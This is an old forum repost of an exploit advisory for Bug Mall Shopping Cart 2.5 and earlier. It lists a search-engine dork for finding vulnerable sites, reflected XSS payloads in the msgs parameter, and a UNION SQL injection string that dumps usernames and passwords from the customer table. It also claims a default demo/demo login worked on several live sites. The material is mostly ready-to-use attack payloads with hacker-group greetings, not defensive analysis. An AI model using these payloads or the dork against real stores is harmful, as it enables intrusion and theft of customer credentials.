hex Posted June 27, 2007 Report Posted June 27, 2007 --==+================================================================================+==----==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==----==+================================================================================+==--AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks )SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zipORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834SITE: http://www.bug-mall.orgDORK: Powered by Bug Software intext:Your Cart ContainsEXPLOITS:EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[html, JAVASCRIPT]EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sitesand sucsefully logged in.EXAMPLES:EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BYt0pP8uZzh4cky0u.org</body><html>EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script>EXAMPLE 3: Paste following into search box ' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION.GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.netFROM GM!: Kw3[R]ln get over it .--==+================================================================================+==----==+ BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS +==----==+================================================================================+==--# milw0rm.com [2007-06-25] Quote